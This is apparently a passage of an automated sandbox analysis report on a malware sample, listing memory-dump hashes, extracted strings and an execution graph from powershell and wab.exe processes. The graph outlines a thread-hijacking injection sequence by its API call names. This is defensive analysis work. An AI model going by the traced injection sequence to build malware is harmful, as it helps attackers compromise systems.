                  • Instruction ID: 9a9429f89648609ebaabb1b417ad77e82b634ad1487dec9c5706c63825242141
                  • Opcode Fuzzy Hash: 3f71b1c8286182dabba532f237f764c686ebd9764c12e6fc821a14f0ff3cb6ea
                  • Instruction Fuzzy Hash: A3414A74A002058FCB05CF99C194ABAFBB1FF88310B158599E4159B365C736FCA1CFA4
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 63687d01c5e642e7bf2bf28d81193af807c794a44dce19d125febba77ce0878f
                  • Instruction ID: 1ccc2574aa3ea1e6b14105f6ffcdb0829a18a8400136a72a4511680b7e269668
                  • Opcode Fuzzy Hash: 63687d01c5e642e7bf2bf28d81193af807c794a44dce19d125febba77ce0878f
                  • Instruction Fuzzy Hash: EE317270B412149FEB14ABA4C854BAE7AA3BBC4344F14C428EA016F781CF76EC068B95
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: db24435a82aa369bd236f8e23548f12ab4b4da6cb704c16b40de657f2270b797
                  • Instruction ID: 854ce0df04cbdb91d2fa7d8959c452666982989ee1ba460544c38c30a46ec6d6
                  • Opcode Fuzzy Hash: db24435a82aa369bd236f8e23548f12ab4b4da6cb704c16b40de657f2270b797
                  • Instruction Fuzzy Hash: C931F5B1A013069FEB11CEA5C8017EA7BA6FF85250F18846FE8049B652C735D981CBE1
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f4df9344ba39c7dc7839d2133c0a533264997fa56259573b9df02593d1f3e16
                  • Instruction ID: 33eb5430f19193f68195c203760c8af1e157dd85930eaa10b7821890e62ebac7
                  • Opcode Fuzzy Hash: 4f4df9344ba39c7dc7839d2133c0a533264997fa56259573b9df02593d1f3e16
                  • Instruction Fuzzy Hash: 91219074F042159FCB11CF58D4909AABBB4FF89310B14809AE819EB392C734ED45CBA0
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2cb84fcf795c7b420ab772335dcdd79bb836ffe99dd7ebf1726866272e5b8912
                  • Instruction ID: 6609a567b9a63ed32bb34230eb29f1ea22844a68943e58a6d4c2d4c21d27e195
                  • Opcode Fuzzy Hash: 2cb84fcf795c7b420ab772335dcdd79bb836ffe99dd7ebf1726866272e5b8912
                  • Instruction Fuzzy Hash: 95212A74A042099FCB00CF58C584AAAFBB1FF89310B1585A9E849EB751C735FC41CBA1
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bbad2c66aec36d5c23a45cb455b189d0aa786d8729edc2e88cc9d550f289d8ce
                  • Instruction ID: 7102e6beb393b2d332c2d4124e7076c536c2c8d07398d86165abb77ad070768d
                  • Opcode Fuzzy Hash: bbad2c66aec36d5c23a45cb455b189d0aa786d8729edc2e88cc9d550f289d8ce
                  • Instruction Fuzzy Hash: BC211974A006199FCB04CF99C4909AAFBB1FF89310B158599E809EB751C735EC41CFA1
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b9063ea9af264e12e6b4af78be13f6206dd54d3ed4213306da1806c65eaf8209
                  • Instruction ID: 7f164da94b1c283f32cf04d1c43174dd81b505636db8bb28f3fb7552e3a3bfd5
                  • Opcode Fuzzy Hash: b9063ea9af264e12e6b4af78be13f6206dd54d3ed4213306da1806c65eaf8209
                  • Instruction Fuzzy Hash: B6210674A0424A8FCB01DF98D5909AAFBF1FF89310B158599E849EB362C735ED41CBA1
                  Memory Dump Source
                  • Source File: 00000010.00000002.1834532422.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_45ad000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f121650674d99ad899a881ef7905f2d620f3d09f55155c868d4321e0d54aea78
                  • Instruction ID: 0cf8dea8152699785c14eec0035f5c54d739b8956f77a3e23c6bf2fdfe864dda
                  • Opcode Fuzzy Hash: f121650674d99ad899a881ef7905f2d620f3d09f55155c868d4321e0d54aea78
                  • Instruction Fuzzy Hash: 18012B315043409FE7206F25ECC4B6BBFA8FF41725F08C419DD480F682E679A84ADAB1
                  Memory Dump Source
                  • Source File: 00000010.00000002.1834532422.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_45ad000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8b2da51fb18c00f4ddbd959df8d1f8f457f2bd9ebe4304c47d47b61e50fe2f95
                  • Instruction ID: dc134601b6230b8a2922e234c7c2d158b052c5b781841b3b3ddaca0ef45eb120
                  • Opcode Fuzzy Hash: 8b2da51fb18c00f4ddbd959df8d1f8f457f2bd9ebe4304c47d47b61e50fe2f95
                  • Instruction Fuzzy Hash: B601923110E3C09FD7125B259894B56BFB4EF43224F1981DBD8888F5A3C2685849CB72
                  Memory Dump Source
                  • Source File: 00000010.00000002.1834532422.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_45ad000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a3a1e6a7f474927bea0b28800da847e9776c1cff1d180710f6a08a7b96ce368c
                  • Instruction ID: 7bee8d400e4ff32799687b10d789c9d4b0c551a3de06997583a6184e19afea13
                  • Opcode Fuzzy Hash: a3a1e6a7f474927bea0b28800da847e9776c1cff1d180710f6a08a7b96ce368c
                  • Instruction Fuzzy Hash: 81213D75604200DFDB08EF10E9C0B1ABF76FB94324F24C569D8090B656C336E46ADBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (oq$(oq$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$tPq$tPq
                  • API String ID: 0-4031905499
                  • Opcode ID: 5a217f498922ee49f82c0406d9e6d0c71e36247b424da736b9172d639fcc679e
                  • Instruction ID: 66db4f8102da85417230e0b90c03b229829d984b121cc48754c7b14851ad4630
                  • Opcode Fuzzy Hash: 5a217f498922ee49f82c0406d9e6d0c71e36247b424da736b9172d639fcc679e
                  • Instruction Fuzzy Hash: 92E193B1B10219DFDB24DF95D8557AEBBA2BF88310F14846EE9099B391CB31DC42CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q$$q
                  • API String ID: 0-2113266693
                  • Opcode ID: 136422a1b064605cf02fbadd2118a38b89baed652d4267ad9b179d03dff20b41
                  • Instruction ID: b4380e4a7aba56d52975b06e9e6bf0e540b9824c52e5ccd2dae8c5ff6ac86a0f
                  • Opcode Fuzzy Hash: 136422a1b064605cf02fbadd2118a38b89baed652d4267ad9b179d03dff20b41
                  • Instruction Fuzzy Hash: D1C1F6B170424ADFDB25CFA9D4143EA7BA2BF86211F18C86FE8198B241D731D841CBB1
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                  • API String ID: 0-4104424984
                  • Opcode ID: b978ee61388f1959a7808f782a5ca8d7f0bbbc74c0301e2a068b4bc2d467435a
                  • Instruction ID: e4aedf83b5e0cd7fd9f833f0642cfb8ad4bcd4f452144e6437adae16ef498c9a
                  • Opcode Fuzzy Hash: b978ee61388f1959a7808f782a5ca8d7f0bbbc74c0301e2a068b4bc2d467435a
                  • Instruction Fuzzy Hash: 4DA126F170530E8FEB25CAA598157EA7BE1BF86610F24C4BFD806CB291DA31D941C792
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$$q$$q$$q$$q$$q$$q
                  • API String ID: 0-2370149875
                  • Opcode ID: 3ed288086c9601a5cfa3b75329f0f1595ecc0c9dce1fc6318559021360068697
                  • Instruction ID: 51eb66ca246b438c7d0faf0abc8ca9ebae8a4889646f001376b8e2a3a178d066
                  • Opcode Fuzzy Hash: 3ed288086c9601a5cfa3b75329f0f1595ecc0c9dce1fc6318559021360068697
                  • Instruction Fuzzy Hash: 14F14B71B043469FDB25CAE998507AABBE2FFC5211F38847FE845CB241EA31E851C791
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$XRq$XRq$XRq$tPq$tPq$$q
                  • API String ID: 0-2663377446
                  • Opcode ID: a0a8826ec269903ee6562a192459f7fa02d042c7953c9da3bc164ee345e5ea21
                  • Instruction ID: 048ed8b8a363d64095bb3a70f9de8b49a0f1248f7693f924ea89088deb291bd5
                  • Opcode Fuzzy Hash: a0a8826ec269903ee6562a192459f7fa02d042c7953c9da3bc164ee345e5ea21
                  • Instruction Fuzzy Hash: DF91E6B5B10205DFDB24DBA994067FABBA2BFC9215F18C46FD8069B381CA31DC41C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
                  • API String ID: 0-2432477355
                  • Opcode ID: b47fd932a73116c6a5003b8526e2333c9cc3d3b8646dd27bdc0bee9c71e56a1a
                  • Instruction ID: ccef0c44985078f0e44e72a3f27fc4b4123b6e2cfe3fae7a434ad07f93fb5729
                  • Opcode Fuzzy Hash: b47fd932a73116c6a5003b8526e2333c9cc3d3b8646dd27bdc0bee9c71e56a1a
                  • Instruction Fuzzy Hash: 4CF115B1B0420A8FDB25DAA899117EABFE2BFC5210F18C4BFD905CB251DA31DC46C791
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$tPq$tPq$$q$(q$(q$(q
                  • API String ID: 0-3442133670
                  • Opcode ID: e158e9bb57a4ad8424abf301dd04b76ed2ebc12c2ccc9baded3d7db7efbf0a6a
                  • Instruction ID: 90467240bdd91dc3dc8658b0f707c18b476161d05b3cb6fa56a9eae6fffa8e67
                  • Opcode Fuzzy Hash: e158e9bb57a4ad8424abf301dd04b76ed2ebc12c2ccc9baded3d7db7efbf0a6a
                  • Instruction Fuzzy Hash: 5961C5B0B10305DFEB24CE95C546BE9B7F6BF89611F19846EE804AB294C731DD41CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$tPq$tPq$tPq
                  • API String ID: 0-1844223728
                  • Opcode ID: 6347c3e50292ca9713d6ab88e3d814a6e5bf6e9eec4aee973687233a6b5e31d2
                  • Instruction ID: 9536d51b5e5158095cec932b620a31b1767ac148f27c59aeaca86e0f9068dd5b
                  • Opcode Fuzzy Hash: 6347c3e50292ca9713d6ab88e3d814a6e5bf6e9eec4aee973687233a6b5e31d2
                  • Instruction Fuzzy Hash: 59A12AF1B047598FD721D7A998417EABBE2BF86210F18C4AFD506CF692DA31C841C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$tPq$$q$$q$$q
                  • API String ID: 0-838716513
                  • Opcode ID: 476417bd08eaa6ca0c9d1e6dff64da8fbf933bdce29a9650e62f7e8bcef2627d
                  • Instruction ID: d720f65abb546b699308970af78fdd93348877f20bcbf4f44ba0d7ad40dd063c
                  • Opcode Fuzzy Hash: 476417bd08eaa6ca0c9d1e6dff64da8fbf933bdce29a9650e62f7e8bcef2627d
                  • Instruction Fuzzy Hash: 876180B0A10286DFEB24CE95DA477EA77A1FF45351F58886FE8015B290C735ED80CBA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$tPq$$q$$q$$q
                  • API String ID: 0-838716513
                  • Opcode ID: 580ca5470c36179b7b16d9fbde315aff4a2ff88f1de290b4be57935e21d0dc36
                  • Instruction ID: 79a213a92a73566f5a9d05ef4739637f198431118a6e2bb35ba7a817abba8fdc
                  • Opcode Fuzzy Hash: 580ca5470c36179b7b16d9fbde315aff4a2ff88f1de290b4be57935e21d0dc36
                  • Instruction Fuzzy Hash: 1041E1B2A04202EFDB25CE85D841BF5BBA1FF45320F18846FE815AF295C731D942CBA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$$q$$q$$q$$q
                  • API String ID: 0-1023332887
                  • Opcode ID: 21440f4cd8df5f9d1ba65e9c5cf49c8ce760b8f8cd7c7c1907d728ff88b01351
                  • Instruction ID: 5160795049af8170eb205f455402e9fb6470ef4d0a714ad423269efbca417bd7
                  • Opcode Fuzzy Hash: 21440f4cd8df5f9d1ba65e9c5cf49c8ce760b8f8cd7c7c1907d728ff88b01351
                  • Instruction Fuzzy Hash: 392148F561620EDFEB24CE85D644BE177A5FB41A61F28C4AFE8068A151C731D884CA93
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (oq$(oq$(oq$(oq
                  • API String ID: 0-3853041632
                  • Opcode ID: 0c670096c5f8bcfba0e5fed0c590ba810e78af7cbd2aca6126e1ffe27d6b16b7
                  • Instruction ID: 54bc85ab4cb0e6508f23cd32d4f8a80e4382ebd879a16d6b719ecbf9459de153
                  • Opcode Fuzzy Hash: 0c670096c5f8bcfba0e5fed0c590ba810e78af7cbd2aca6126e1ffe27d6b16b7
                  • Instruction Fuzzy Hash: C1F135B1B043059FDB24DEA9D8547EABBB2BF86210F14847FE505CB291DB36D841CBA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$4'q$4'q
                  • API String ID: 0-4210068417
                  • Opcode ID: 44bfbab1fdf600e87c3715b69c592160f5540fd24478bcdb673dfd845a0b5dc8
                  • Instruction ID: fbf8ace78b381af49703a63541b45d2b47455ce3140540ab7b11e5fa5418d021
                  • Opcode Fuzzy Hash: 44bfbab1fdf600e87c3715b69c592160f5540fd24478bcdb673dfd845a0b5dc8
                  • Instruction Fuzzy Hash: 4EA108B1B05319CFDB15DBA9DD447EABBA2BFC6210F1484AFD40ACB291DA31C841C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$tPq$tPq
                  • API String ID: 0-1392854178
                  • Opcode ID: 6ebfd2b0944968cea5e399ee09def3c06b65aadba1937f08204e3722a402e434
                  • Instruction ID: 7b53cca8fd3f817e89be165a29e40f50e2414d80baf8bd3b6ed8539cd4bd2417
                  • Opcode Fuzzy Hash: 6ebfd2b0944968cea5e399ee09def3c06b65aadba1937f08204e3722a402e434
                  • Instruction Fuzzy Hash: 94917DB1A11219DFDB24CF94C944BE9FBB2BF49310F18849EE909AB291C771DC81CB81
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: XRq$XRq$tPq$$q
                  • API String ID: 0-1549039314
                  • Opcode ID: d30964d86ab732106b9a587f1709dd746aef27c473d4ae06eafdbb490a7b1fd2
                  • Instruction ID: 7e7766becfff0fd052f5a587d7d72347c4f4066f8f4c45292845deb4c5d06b29
                  • Opcode Fuzzy Hash: d30964d86ab732106b9a587f1709dd746aef27c473d4ae06eafdbb490a7b1fd2
                  • Instruction Fuzzy Hash: F34180B1A00205DFDB24CE95C546BE9BBF2BF85314F19C5AEE4056B291CB31ED81CBA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: $q$$q$$q$$q
                  • API String ID: 0-4102054182
                  • Opcode ID: f0e09ad53e960081ca7d551e22c4307b95005ee35c40d57e71eb494b78dff625
                  • Instruction ID: 373b863929933ceae0194e06718f82f2f2fd18d3d572698bc869fe3285eb6b62
                  • Opcode Fuzzy Hash: f0e09ad53e960081ca7d551e22c4307b95005ee35c40d57e71eb494b78dff625
                  • Instruction Fuzzy Hash: E42166B1B103069FEB3496AA9891BA776DABBC1715F64883FE909CF3C1DD35C8418361
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$$q$$q
                  • API String ID: 0-3199993180
                  • Opcode ID: f7abbd4d0a0e29beaa3ec88adadedc223db8ed3d9cf7342606fae8130e79ec3a
                  • Instruction ID: 294142736d0099c4a9205969e4a81beed396bc3aff9af8a238c2b065ed55fc28
                  • Opcode Fuzzy Hash: f7abbd4d0a0e29beaa3ec88adadedc223db8ed3d9cf7342606fae8130e79ec3a
                  • Instruction Fuzzy Hash: 26012B9170E78A5FD32B52683C202A97FB2AFC385471E44DFD481CB657CC158C0A8367

                  Execution Graph

                  Execution Coverage:0.5%
                  Dynamic/Decrypted Code Coverage:77.8%
                  Signature Coverage:27.8%
                  Total number of Nodes:18
                  Total number of Limit Nodes:1
                  execution_graph 81326 667ceb4 81329 667ceeb 81326->81329 81327 667cf13 Sleep 81327->81326 81328 667cf21 NtProtectVirtualMemory 81328->81329 81329->81326 81329->81327 81329->81328 81330 22462ad0 LdrInitializeThunk 81337 2235cb84 81340 2235a042 81337->81340 81339 2235cba5 81341 2235a06b 81340->81341 81342 2235a2fc NtSuspendThread 81341->81342 81344 2235a1ef 81341->81344 81343 2235a30d 81342->81343 81345 2235a331 81342->81345 81343->81339 81344->81339 81347 2235a4a6 NtSetContextThread 81345->81347 81349 2235a4f2 81345->81349 81346 2235a552 NtResumeThread 81346->81344 81348 2235a4bd 81347->81348 81348->81349 81350 2235a4da RtlQueueApcWow64Thread 81348->81350 81349->81346 81350->81349

                  Control-flow Graph

                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009458870.0000000022350000.00000040.00000800.00020000.00000000.sdmp, Offset: 22350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_22350000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: 0
                  • API String ID: 0-4108050209
                  • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                  • Instruction ID: 523f81c283f12af2711efa662412b1997bb746d6e8027c8e73d51cbebce7459c
                  • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                  • Instruction Fuzzy Hash: 37F1FA70918B8C8FDBA9EF68C894AEEB7E1FB98304F40462AD44ED7250DF349655CB41

                  Control-flow Graph

                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009638634.0000000022390000.00000040.00000800.00020000.00000000.sdmp, Offset: 22390000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_22390000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: 0
                  • API String ID: 0-4108050209
                  • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                  • Instruction ID: 9906201c9a8960a605cd302b9e934d063e35c5abf67afbc5510c1ee79e586f16
                  • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                  • Instruction Fuzzy Hash: 49F11F70928B8C8FDBA5EF68C894AEEB7E1FF99304F40462AD54AD7250DF349641CB41

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 208 667ceb4-667cee4 209 667cee6-667cef7 call 667c7fe 208->209 211 667cf05-667cf11 209->211 212 667cef9-667cf03 209->212 213 667cf13-667cf1c Sleep 211->213 214 667cf21-667cf61 NtProtectVirtualMemory call 667c7fe 211->214 212->211 213->208 217 667cf66-667cf77 214->217 217->208
                  APIs
                  • Sleep.KERNELBASE(00000005), ref: 0667CF17
                  Memory Dump Source
                  • Source File: 00000014.00000002.1970441632.0000000006340000.00000040.00000400.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_6340000_wab.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 88363f3c17380202f3e65e121019ee9a3097aeeac99ffdcc8c4e45a29335b959
                  • Instruction ID: 2c2a25a4ba932bec6b3db70e69c1d9166f97ca5a527d86c2776c0ff2809a85af
                  • Opcode Fuzzy Hash: 88363f3c17380202f3e65e121019ee9a3097aeeac99ffdcc8c4e45a29335b959
                  • Instruction Fuzzy Hash: 3911E3B1540741AFE3416F34CE8CB9ABBA0AF153D1F5A8144ED619B5A6D3B9CD85CF00

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 218 22462ad0-22462adc LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: e35408b7828578eb18525c4a34db4dee533a698c03dcea24a8f54822d9ffa729
                  • Instruction ID: b0ce47fb1987ef0ef881985997ed4ae5fab6e64887e351a37bed331cf2739c56
                  • Opcode Fuzzy Hash: e35408b7828578eb18525c4a34db4dee533a698c03dcea24a8f54822d9ffa729
                  • Instruction Fuzzy Hash: B7900435311500030105F55C0744557005747F53513D5C033F1115510CD731CD757131

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 219 22462bf0-22462bfc LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 9b9c41571cd794d1125db298f55cd68e5b98f1fe685d61edceacdaec2296c263
                  • Instruction ID: 4a09799c756a250ffa1c6a2d41753f3b58ce7ac7bfc12dd2943bf9e52acd7bca
                  • Opcode Fuzzy Hash: 9b9c41571cd794d1125db298f55cd68e5b98f1fe685d61edceacdaec2296c263
                  • Instruction Fuzzy Hash: 2290023120150802D1807158444469A001547E1301FD5C026A0125614DCA158B5D77A1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 226 22462e80-22462e8c LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 063b281c03211b741ac5791e91aadc736f8660bf6597f5d4ef797f09a36a5dbf
                  • Instruction ID: bce533558101fdd8b5a0dc00b57231834b14278d55edca15676e8deb72ad3fdb
                  • Opcode Fuzzy Hash: 063b281c03211b741ac5791e91aadc736f8660bf6597f5d4ef797f09a36a5dbf
                  • Instruction Fuzzy Hash: 1C90023160150502D10171584444666001A47E0241FD5C033A1124515ECA258A96B131

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 227 22462ea0-22462eac LdrInitializeThunk
                  APIs
                  Memory Dump Source
